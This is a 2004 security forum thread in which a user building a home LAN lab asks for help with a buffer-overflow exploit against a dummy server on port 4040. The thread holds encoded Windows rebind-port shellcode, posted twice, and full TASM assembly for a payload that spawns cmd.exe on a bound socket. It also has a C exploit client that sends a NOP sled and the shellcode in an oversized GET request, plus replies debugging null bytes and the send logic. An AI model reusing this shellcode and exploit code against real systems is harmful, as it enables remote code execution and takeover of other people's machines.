-
November 19th, 2004, 03:48 PM
#1
Senior Member
setting up hacking lab
Well, let me be honest: it was not a hacking LAN, it was more of a gaming LAN set up by 4 computer-game-crazy kids (including me). But I am also using that LAN to increase my computer security knowledge, trying out a few exploits and coding my own exploits and using them, like the WebDAV exploit using a rebind shell on port 80. It was really fun.
But I had a few problems too. Say I want to code an exploit for an application (or server) that runs on port 4040. That server is costly ($500) so I can't buy it; I am trying to make a dummy server that will run on the same port 4040 and accept a string from the user and store it in a buffer 46500 bytes long, just as the server I am trying to exploit does.
So it will crash on any valid request above 46500 bytes.
I have been able to send a valid request to the dummy server and crash it, but when I was trying to bind it to the same port after the service crash (rebind shellcode for port 4040,
http://www.scan-associates.net/papers/one-way.zip ) it didn't work. The original server runs as a system program by default after installation. I just wanted to confirm: is it a requirement for exploitation that the software I am exploiting be a system program? If yes, how can I make my dummy server a system application?
-
November 19th, 2004, 04:35 PM
#2
No, it is not a requirement that it be a SYSTEM account, but that is the ideal type of service to exploit because once you exploit the app your code will run under the same security context as the application you are exploiting. So, having SYSTEM access is as good as/better than an Admin, whereas if the app was running as a user you would be limited to operations that user has permissions for, which is not as cool as SYSTEM but can probably be leveraged for greater access later. I would suggest using srvany.exe to register your dummy program as a service. Once you register it as a service you can either run it as SYSTEM or any account you specify and play with it from there. Have fun.
-Maestr0
"If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software." -Jaron Lanier
-
November 19th, 2004, 04:58 PM
#3
Senior Member
Thanks. If it is not a requirement, then can you suggest why I was not able to get a rebind shell as I wanted? Is there something wrong with my coding (maybe in the shellcode) or can it be something else?
-
November 19th, 2004, 07:43 PM
#4
Before you try to spawn a reverse shell, make sure that your exploit is working properly. Start off by writing an exploit that runs locally to pop a cmd.exe or just a 'Hello, World' to ensure you can control program flow. Once you are sure the exploit is coded properly then you can try different payloads.
-Maestr0
PS. I'm glad you're doing this on your home LAN and not a school computer. There's absolutely nothing wrong with hacking, but there's a RIGHT way and a WRONG way. The RIGHT way can get you a well paying job doing what you love to do, the WRONG way can get you some prison time. Think about what you want from life.
-
November 19th, 2004, 07:49 PM
#5
Good luck with your hacking lab. I only advise you to review all precautions BEFORE you start testing, to avoid having something "leak" from your test lab to your "good machines".
My site
FORMAT C: Yes ...Yes??? ...Nooooo!!! ^C ^C ^C ^C ^C
If I die before I sleep, I pray the Lord my soul to encrypt. If I die before I wake, I pray the Lord my soul to brake.
-
November 19th, 2004, 08:28 PM
#6
Senior Member
Here is my rebind shellcode, which binds a shell to the same port (port 4040). You can telnet to the target after successful exploitation and get a shell.
unsigned char shellc0de[] =
"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x58\x83\xC0\x1B\x8D\xA0\x01"
"\xFC\xFF\xFF\x83\xE4\xFC\x8B\xEC\x33\xC9\x66\xB9\x0C\x02\x80\x30"
"\x00\x40\xE2\xFA\x06\x7E\xA9\x96\x96\x96\x18\xD8\x98\x7A\xE4\x68"
"\x25\x80\x15\x2F\x23\xEE\x44\x51\x31\xFE\x0A\x03\x8C\xF8\x37\xFC"
"\xAB\x4E\x45\x51\x31\x7E\x1E\xA9\xDC\x08\xE1\xE5\xA4\xC9\xA5\xA4"
"\x96\x5D\x7B\x6A\xAD\x4F\x9F\x63\x3B\x32\x8C\xE6\x51\x32\x3B\xB8"
"\x7F\x73\xDF\x10\xDF\xF5\xFB\xF2\x96\xCC\xC4\xF2\xF1\x37\xA6\x96"
"\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xCE\x9E\x1D\x64\x1D\x68\x17\x79"
"\x96\x97\x96\x96\xA5\x5F\x27\x9E\x7E\x06\x97\x96\x96\xC4\xC0\x69"
"\xC1\x76\xCC\x1D\x4E\x15\x50\x91\xA5\x5F\x27\x93\x7E\xEA\x97\x96"
"\x96\x7E\x15\x96\x96\x96\xF0\x17\x7A\x06\x97\xC2\xFE\x97\x97\x96"
"\x96\x69\xC1\x7A\x1D\x7A\xA5\x56\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6"
"\x69\xC1\x66\x1D\x4E\xF0\x51\xD3\x96\x94\x96\xF0\x51\xD3\x94\x19"
"\x9A\x51\xD3\x92\x96\x96\x96\x96\xFC\x86\xC3\xC5\x69\xC1\x62\x13"
"\x56\xE3\x74\xD6\xC6\xC5\x69\xC1\x6E\xC6\xC6\xC5\x69\xC1\x6A\x1D"
"\x4E\xA5\x56\xA5\x5F\x27\x87\xC1\x1D\x6B\x65\x3D\xC9\x50\xD3\x96"
"\xD2\x1F\xCB\xAA\x1F\xCB\xAE\x1F\xCB\xD6\xF0\x51\xD3\xBA\x97\x97"
"\x1B\xD3\xD2\xC6\xC3\xC7\xC7\xC7\xD7\xC7\xDF\xC7\xC7\xC0\xC7\x69"
"\xC1\x46\xA5\x56\xDE\xC6\x69\xC1\x42\xA5\x56\xA5\x5F\x27\x87\xC1"
"\x1D\x6B\x65\x3D\xC9\x1B\xDB\xD2\xC7\xC3\xC6\xC6\xFC\x92\xFC\x96"
"\xC6\xC6\xC0\xC6\x69\xC1\x46\x17\x7A\x96\x92\x96\x96\xFE\x91\x96"
"\x97\x96\xC2\x69\xE3\xDE\x69\xC1\x4E\xFC\xD6\xFE\x96\x86\x96\x96"
"\xFE\x96\xC6\x96\x96\xFC\x96\x69\xE3\xD2\x69\xC1\x4A\x1D\x4E\x17"
"\x55\x96\x97\x96\x96\x1F\x0A\xB2\x2E\x96\x96\x96\x1F\x0A\xB2\x22"
"\x96\x96\x96\x1D\x1A\xB2\x92\x92\x96\x96\x51\xD7\x6D\x06\x06\x06"
"\x06\x50\xD7\x69\x06\x17\x7F\x14\x97\x96\x96\xFC\x96\xFE\x96\x86"
"\x96\x96\xC7\xC6\x69\xE3\xD2\x69\xC1\x76\xC2\x69\xE3\xDE\x69\xC1"
"\x72\x69\xE3\xDE\x69\xC1\x7E\xA5\x56\xDE\xC6\x69\xC1\x42\xC5\xC3"
"\xC0\xC1\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D"
"\xDC\x8E\x1D\xCC\xB6\x95\x4B\x75\xAF\xDF\x1D\xA2\x1D\x95\x63\xA5"
"\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x9D\x06\x06\x06\x06\x57\x59\x9B"
"\x95\x6E\x7D\x78\xAD\xEA\xB2\x82\xE3\x4B\x1D\xCC\xB2\x95\x4B\xF0"
"\x1D\x9A\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x93\x06"
"\x06\x06\xA5\x56\x1D\x43\xC9\xC8\xCB\xCD\x54\x92\x96\xC7\xC5\x69"
"\xA0\x7E\x0E\x69\x69\x69\x3D\x3B\xCD\xCF\x74\x67\x55";
Anyway, I am not able to get a shell after the service terminates.
I think there is something wrong with this shellcode, don't know what.
-
November 20th, 2004, 06:07 AM
#7
Banned
That \x00 is surely allowed; there is absolutely nothing wrong with it. I like the way you are going about learning these things. Exploitation is not as easy as it may appear at first look, but once you master it you are on a roll.
As far as your shellcode not working, I will suggest you get some code from Packetstorm. Start off with simple shellcodes and use them in your exploit, then try to figure out how to write your own.
It is really difficult to find any programming mistake you have made in asm, especially if you are a newbie.
Just always keep a reference with you while working with it.
-
November 20th, 2004, 06:49 AM
#8
Senior Member
Here is my rebind shellcode, taken from http://www.scan-associates.net/papers/one-way.zip
Remember it is in TASM.
rebind.asm
-------------------------------
;rebind port shellcode
;port at 0xcf
;sk@scan-associates.net
.386p
locals
.model flat, stdcall
.code
start:
db 0ebh,02 ;jmp $+2
db 0ebh, 05h ;jmp $+5
db 0e8h, 0f9h,0ffh,0ffh,0ffh ;call $-7
pop eax
add eax, 1bh
lea esp,[eax-3ffh]
and esp, 0fffffffch
mov ebp,esp
xor ecx,ecx
mov cx,20ch ;size
decode:
xor byte ptr [eax], 0
inc eax
loop decode
;header len = 36
nop
call here
; dd 073e2d87eh ;ExitProcess 77E798FD
dd 0ec0e4e8eh ;LoadLibraryA 77E7D961
dd 016b3fe72h ;CreateProcessA 77E61BBC
dd 078b5b983h ;TerminateProcess
dd 068a7c7d2h ;GetThreadContext 77E938C2
dd 06e1a959ch ;VirtualAllocEx 77E7AC24
dd 0d83d6aa1h ;WriteProcessMemory 77E61A94
dd 0e8a7c7d3h ;SetThreadContext 77E9391A
dd 09e4a3f88h ;ResumeThread 77E6A12D
db "ws2_32",0
dd 03bfcedcbh ;WSAStartup
dd 0adf509d9h ;WSASocketA 71ABCF31
dd 0c7701aa4h ;bind 71ABC328
dd 0e92eada4h ;listen 71ABC777
dd 0498649e5h ;accept 71ABCF85
db "cmd",0
here:
pop edx
push edx
mov eax,fs:[30h]
mov eax,[eax+0ch]
mov esi,[eax+1ch]
lodsd
mov ebx,[eax+08h]
mov esi,edx
mov edi,esi
sub edi,100h ;dun mess wif code
xor ecx,ecx
;Get 3 Addr
mov cl,8
call loadaddr
; add esi,0Ch
;Load ws2_32
push edx
push esi
call dword ptr [edi-32] ;LoadLibraryA
pop edx
mov ebx,eax
add esi,7
xor ecx,ecx
mov cl,5
call loadaddr
call fork
sub sp, 400
push esp
push 101h
call [edi -20] ;WSAStartup
mov ebp,esp
;add esi,7
again:
xor eax,eax
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax
call dword ptr [edi-16] ;WSASocketA
; cmp eax,0FFFFFFFFh
; je exit
;bind, listen, accept
mov ebx,eax
bind:
mov word ptr [ebp],2
mov word ptr [ebp+2],0C8Fh ;port
mov dword ptr [ebp+4], 0 ;IP
push 10h
push ebp
push ebx
call dword ptr [edi-12] ;bind
test eax,eax
jne bind
inc eax
push eax
push ebx
call dword ptr [edi-8] ;listen (soc, 1);
;test eax,eax
;jne exit
push eax
push eax
push ebx
call dword ptr [edi-4] ;accept
;cmp eax,0FFFFFFFFh
;je exit
mov ebx,eax
xor eax,eax
xor ecx,ecx
mov cl,11h
push edi
mov edi,ebp
rep stos dword ptr [edi]
pop edi
mov byte ptr [ebp],44h
mov dword ptr [ebp+3Ch],ebx
mov dword ptr [ebp+38h],ebx
mov dword ptr [ebp+40h],ebx
mov word ptr [ebp+2Ch],0101h
lea eax,[ebp+44h]
push eax
push ebp
push ecx
push ecx
push ecx
inc ecx
push ecx
dec ecx
push ecx
push ecx
push esi
push ecx
call dword ptr [edi-48] ;CreateProcess
exit:
;jmp again
;push eax
xor eax,eax
dec eax
push eax
call dword ptr [edi-44] ;TerminateProcess
fork:
xor eax,eax
xor ecx,ecx
mov cl,11h
push edi
mov edi,ebp
rep stos dword ptr [edi]
pop edi
lea ecx,[ebp+44h]
push ecx
push ebp
;code ripped from LSD, thanks Michal!
push eax
push eax
push 04h ; flag=CREATE_SUSPENDED
push 0 ; inherit=FALSE
push eax
push eax
push esi ; cmdline="cmd"
push eax ; appname=NULL
call [edi-48] ; CreateProcess
;add ebp,44h
sub esp,0400h
push 00010007h ; ctx.ContextFlags=CONTEXT_FULL
push esp ; ctx
push dword ptr [ebp+48h] ; hthread
call [edi-40] ; GetThreadContext
push 40h ; PAGE_EXECUTE_READWRITE
push 1000h ; MEM_COMMIT
push 5000h ; 20kb
push 0
push dword ptr [ebp+44h]
;push ebp
call [edi-36] ; alloc memory in a new process
mov ebx,eax ; buf=allocated memory
add ebx,100h ; eip=buf+2 (jmp instruction)
mov [esp+0b8h],ebx ; ctx.Eip=eip
mov [esp+0b4h],ebx ; ctx.Ebp=eip ???
;mov ecx,[esp+4+3ffh-104h] ; return address
mov ecx,[esp+4+0400h]
mov dword ptr [ecx-5],90909090h ;no more fork
mov byte ptr [ecx-1],90h
sub ecx,182h ;change here!!!
push 0
; push 2000h
push 1000h
push ecx
push eax
push dword ptr [ebp+44h]
call [edi-32] ;WriteProcessMemory
push esp
push dword ptr [ebp+48h]
call [edi-28] ;SetThreadContext
push dword ptr [ebp+48h]
call [edi-24] ;ResumeThread
xor eax,eax
dec eax
push eax
call dword ptr [edi-44] ;TerminateProcess
; add esp,0400h+4
; ret
; LGetProcAddress(HASH, DLLBASE) ;stolen from HD Moore
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24] ; DLL Base Address
mov eax, [ebp + 3ch] ; eax = PE header offset
mov edx, [ebp + eax + 120]
add edx, ebp ; edx = exports directory table
mov ecx, [edx + 24] ; ecx = number of name pointers
mov ebx, [edx + 32]
add ebx, ebp ; ebx = name pointers table
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp ; esi = name pointer
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp LHshlp
LFnd:
; compare computed hash to argument
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36] ; ebx = ordinals table RVA
add ebx, ebp
mov cx, [ebx + 2 * ecx] ; ecx = function ordinal
mov ebx, [edx + 28] ; ebx = address table RVA
add ebx, ebp
mov eax, [ebx + 4 * ecx] ; eax = address of function RVA
add eax, ebp
jmp LDone
LNtfnd:
xor eax, eax
LDone:
mov edx, ebp
pop edi
pop esi
pop ebp
pop ebx
ret 4
loadaddr:
push ecx
push ebx
; push esi
push dword [esi-4]
;db 0ffh,34h
call LGetProcAddress
stosd
lodsd ;esi+4
pop ebx
pop ecx
loop loadaddr
ret
end start
.data
-----------------------------------------
If you study it carefully there is a field where you assign the bind port and the IP address, in network byte order.
The IP has been left 0. The port number is 4040 in our case, which is 00000fc8 in hex, and I have put it as 0C8Fh in network byte order.
Is that all right?
In my C code I am simply connecting to 4040 and creating a buffer 3000 bytes long, the first 2200 bytes filled with NOPs, i.e. 0x43, then the shellcode.
I am not using padding in my code, whereas all other code I find on the net (based on the rebind shellcode) uses padding.
Does that make a difference?
Here is my C code:
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h> /* atoi, strtoul */
#include <string.h> /* memcpy, memset, strlen */
#include <conio.h>  /* getch */
#pragma comment (lib,"ws2_32")
unsigned char shellc0de[] =
/* sk - rebind port 4040 shellcode 0xcf = port */
"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x58\x83\xC0\x1B\x8D\xA0\x01"
"\xFC\xFF\xFF\x83\xE4\xFC\x8B\xEC\x33\xC9\x66\xB9\x0C\x02\x80\x30"
"\x00\x40\xE2\xFA\x06\x7E\xA9\x96\x96\x96\x18\xD8\x98\x7A\xE4\x68"
"\x25\x80\x15\x2F\x23\xEE\x44\x51\x31\xFE\x0A\x03\x8C\xF8\x37\xFC"
"\xAB\x4E\x45\x51\x31\x7E\x1E\xA9\xDC\x08\xE1\xE5\xA4\xC9\xA5\xA4"
"\x96\x5D\x7B\x6A\xAD\x4F\x9F\x63\x3B\x32\x8C\xE6\x51\x32\x3B\xB8"
"\x7F\x73\xDF\x10\xDF\xF5\xFB\xF2\x96\xCC\xC4\xF2\xF1\x37\xA6\x96"
"\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xCE\x9E\x1D\x64\x1D\x68\x17\x79"
"\x96\x97\x96\x96\xA5\x5F\x27\x9E\x7E\x06\x97\x96\x96\xC4\xC0\x69"
"\xC1\x76\xCC\x1D\x4E\x15\x50\x91\xA5\x5F\x27\x93\x7E\xEA\x97\x96"
"\x96\x7E\x15\x96\x96\x96\xF0\x17\x7A\x06\x97\xC2\xFE\x97\x97\x96"
"\x96\x69\xC1\x7A\x1D\x7A\xA5\x56\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6"
"\x69\xC1\x66\x1D\x4E\xF0\x51\xD3\x96\x94\x96\xF0\x51\xD3\x94\x19"
"\x9A\x51\xD3\x92\x96\x96\x96\x96\xFC\x86\xC3\xC5\x69\xC1\x62\x13"
"\x56\xE3\x74\xD6\xC6\xC5\x69\xC1\x6E\xC6\xC6\xC5\x69\xC1\x6A\x1D"
"\x4E\xA5\x56\xA5\x5F\x27\x87\xC1\x1D\x6B\x65\x3D\xC9\x50\xD3\x96"
"\xD2\x1F\xCB\xAA\x1F\xCB\xAE\x1F\xCB\xD6\xF0\x51\xD3\xBA\x97\x97"
"\x1B\xD3\xD2\xC6\xC3\xC7\xC7\xC7\xD7\xC7\xDF\xC7\xC7\xC0\xC7\x69"
"\xC1\x46\xA5\x56\xDE\xC6\x69\xC1\x42\xA5\x56\xA5\x5F\x27\x87\xC1"
"\x1D\x6B\x65\x3D\xC9\x1B\xDB\xD2\xC7\xC3\xC6\xC6\xFC\x92\xFC\x96"
"\xC6\xC6\xC0\xC6\x69\xC1\x46\x17\x7A\x96\x92\x96\x96\xFE\x91\x96"
"\x97\x96\xC2\x69\xE3\xDE\x69\xC1\x4E\xFC\xD6\xFE\x96\x86\x96\x96"
"\xFE\x96\xC6\x96\x96\xFC\x96\x69\xE3\xD2\x69\xC1\x4A\x1D\x4E\x17"
"\x55\x96\x97\x96\x96\x1F\x0A\xB2\x2E\x96\x96\x96\x1F\x0A\xB2\x22"
"\x96\x96\x96\x1D\x1A\xB2\x92\x92\x96\x96\x51\xD7\x6D\x06\x06\x06"
"\x06\x50\xD7\x69\x06\x17\x7F\x14\x97\x96\x96\xFC\x96\xFE\x96\x86"
"\x96\x96\xC7\xC6\x69\xE3\xD2\x69\xC1\x76\xC2\x69\xE3\xDE\x69\xC1"
"\x72\x69\xE3\xDE\x69\xC1\x7E\xA5\x56\xDE\xC6\x69\xC1\x42\xC5\xC3"
"\xC0\xC1\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D"
"\xDC\x8E\x1D\xCC\xB6\x95\x4B\x75\xAF\xDF\x1D\xA2\x1D\x95\x63\xA5"
"\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x9D\x06\x06\x06\x06\x57\x59\x9B"
"\x95\x6E\x7D\x78\xAD\xEA\xB2\x82\xE3\x4B\x1D\xCC\xB2\x95\x4B\xF0"
"\x1D\x9A\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x93\x06"
"\x06\x06\xA5\x56\x1D\x43\xC9\xC8\xCB\xCD\x54\x92\x96\xC7\xC5\x69"
"\xA0\x7E\x0E\x69\x69\x69\x3D\x3B\xCD\xCF\x74\x67\x55";
void help(char *program)
{
printf("aj's syntax: %s server bind_port [\r\ni.e: %s 10.1.1.1 80 \r\n",program,program);
getch();
return;
}
unsigned int resolve(char *name)
{
struct hostent *he;
unsigned int ip;
if((ip=inet_addr(name))==(-1))
{
if((he=gethostbyname(name))==0)
return 0;
memcpy(&ip,he->h_addr,4);
}
return ip;
}
void main(int argc, char *argv[])
{
WSADATA wsaData;
unsigned short port=0;
char *port_to_shell="", *ip1="", data[150]="";
unsigned int i,j;
unsigned int ip = 0 ;
int s, PAD;
struct hostent *he;
struct sockaddr_in crpt;
char buffer[3000] ="";
char request[3300]; // huuuh, what a mess!
if(argc<3){
help(argv[0]);
return;
}
PAD = argc==4 ? strtoul(argv[3],0,16): 0x4e;
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error starting winsock..");
return;
}
printf("Exploiting ******** server \n");
*(unsigned short *)&shellc0de[0xcf] = htons(atoi(argv[2])) ^ 0x4040;
if ((he = gethostbyname(argv[1]))==0){
printf("error: can't resolve '%s'",argv[1]);
return;
}
crpt.sin_port = htons(4040);
crpt.sin_family = AF_INET;
crpt.sin_addr = *((struct in_addr *)he->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return;
}
printf("Connecting... ");
if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1)
{
printf("ERROR\r\n");
return;
}
// No Operation.
for(i=0;i<sizeof(buffer);buffer[i]=0x90,i++);
for(i=2100,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de);buffer[i]=shellc0de[j],i++,j++);
// well..it is not necessary..
//for(i=0;i<2500;buffer[i]=0x41,i++);
buffer[sizeof(buffer)]=0x00;
memset(request,0,sizeof(request));
//Offset from MetaSploit!
//buffer[283] = PAD+1;//0x4f;
//buffer[284] = PAD; //0x4e;
send(s,request,strlen(request),0);
sprintf(request,"GET http://O%s",buffer);
sprintf(request,"%s\r\n\r\n",request);
printf("\nCONNECTED \r\nSending evil request... ");
printf("\n\n%s\n\n",request);
send(s,request,strlen(request),0);
printf("SENT\r\n");
recv(s,data,sizeof(data),0);
if(data[0]!=0x00)
{
printf("data: %s\r\n",data);
}
else
printf("Now connect to port 4040 to get a shell!\r\n");
closesocket(s);
return;
}
As you can see it just sends a valid request to the server (a long one). The overflow occurs at 2034, so after the NOPs we have placed a shellcode that is supposed to bind a shell to a port specified by the user,
or 4040 by default.
The code is working fine; any mistakes, if found, are copy-paste mistakes. I am able to terminate the dummy server but not able to get a shell.
There must be some problem with this shellcode I have designed.
I have decided to install Win2000 Server with IIS 5, enable WebDAV and try to create the same rebind shellcode for port 80.
See how it goes.
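A byte-order check for the sockaddr_in port field discussed above, written as an added example (not code from the post or from the one-way paper): it computes the 16-bit immediate a little-endian x86 word store needs so that the port lands in network order, decodes an immediate back to the port it really selects, and lays out the 16-byte address image the way the stub does.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* x86 stores a 16-bit immediate little-endian (low byte first), while
   sin_port must hold the port big-endian (network order).  So the
   immediate for `mov word ptr [ebp+2], imm16` is the byte-swapped port;
   on a little-endian host htons() yields the same value. */
uint16_t imm_for_port(uint16_t port)
{
    return (uint16_t)((port << 8) | (port >> 8));
}

/* Inverse: the port a given immediate really selects once bind() reads
   sin_port in network order.  A byte swap is its own inverse. */
uint16_t port_from_imm(uint16_t imm)
{
    return imm_for_port(imm);
}

/* 16-byte sockaddr_in image as the stub builds it: [0..1] family,
   [2..3] port, [4..7] address (both network order), [8..15] zero padding.
   Returns the length that is passed to bind(). */
size_t build_sockaddr_in(uint8_t out[16], uint16_t port, uint32_t ipv4)
{
    memset(out, 0, 16);
    out[0] = 2;                      /* AF_INET as a little-endian word */
    out[2] = (uint8_t)(port >> 8);   /* high byte first */
    out[3] = (uint8_t)(port & 0xff);
    out[4] = (uint8_t)(ipv4 >> 24);
    out[5] = (uint8_t)(ipv4 >> 16);
    out[6] = (uint8_t)(ipv4 >> 8);
    out[7] = (uint8_t)(ipv4 & 0xff);
    return 16;
}

/* Read the port back from such an image, as bind() would see it. */
uint16_t sockaddr_port(const uint8_t in[16])
{
    return (uint16_t)((in[2] << 8) | in[3]);
}

/* Round trip for `port` on INADDR_ANY: family and port must read back. */
int sockaddr_roundtrip(uint16_t port)
{
    uint8_t sa[16];
    return build_sockaddr_in(sa, port, 0) == 16
        && sa[0] == 2 && sa[1] == 0
        && sockaddr_port(sa) == port;
}

int main(void)
{
    printf("port 4040 needs immediate 0x%04X\n", (unsigned)imm_for_port(4040));
    printf("immediate 0x0C8F selects port %u\n", (unsigned)port_from_imm(0x0C8F));
    return 0;
}
```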
-
November 20th, 2004, 08:58 PM
#9
Senior Member
sforce, that \x00 is not allowed; 00 is replaced by your decoding argument, in my case 96,
so \x00 is replaced by \x96.
That part is over anyway. It is a remote exploit having the structure nopnopnop.........(overflow here).....nopnop..shellcode
What is the role of the ret address in this case? Because that might be the missing link of this shellcode.
Is it required here?
-
November 20th, 2004, 11:53 PM
#10
Get rid of the NULL byte.
-Maestr0
EDIT: Something else. This may be what you want, I'm not sure; your code is a bit umm.....messy, but here:
buffer[sizeof(buffer)]=0x00;
memset(request,0,sizeof(request));
## Zero out the 'request' buffer
//Offset from MetaSploit!
//buffer[283] = PAD+1;//0x4f;
//buffer[284] = PAD; //0x4e;
send(s,request,strlen(request),0); ## Empty?
## You sent the 'request' buffer which is 3300 Zero's right now (Has it overflowed already?)
sprintf(request,"GET http://O%s",buffer);
sprintf(request,"%s\r\n\r\n",request);
## Now you have written the actual request + SC into the 'request' buffer
printf("\nCONNECTED \r\nSending evil request... ");
printf("\n\n%s\n\n",request);
send(s,request,strlen(request),0);
## Now you have sent it again. Is this intentional?
You will still need to avoid the null byte in the shellcode. If it's a register you can just use the lower half of the 16-bit register.
-Maestr0